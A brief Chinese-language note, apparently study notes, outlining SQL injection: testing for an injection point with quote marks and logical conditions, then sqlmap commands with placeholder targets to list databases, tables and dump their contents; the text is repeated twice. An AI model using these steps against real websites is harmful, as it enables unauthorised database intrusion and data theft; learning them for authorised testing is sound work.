1.找到注入点
在后面加上’或者“来判断。
用逻辑运算判断是否有不一样,若不一则可以注入
2.寻找库名 sqlmap -u “域名” dbs
3.表名 sqlmap -u “域名” -D库名 --table
4.看数据 sqlmap -u “域名” -D库名 -T表名 --dump
1.找到注入点
在后面加上’或者“来判断。
用逻辑运算判断是否有不一样,若不一则可以注入
2.寻找库名 sqlmap -u “域名” dbs
3.表名 sqlmap -u “域名” -D库名 --table
4.看数据 sqlmap -u “域名” -D库名 -T表名 --dump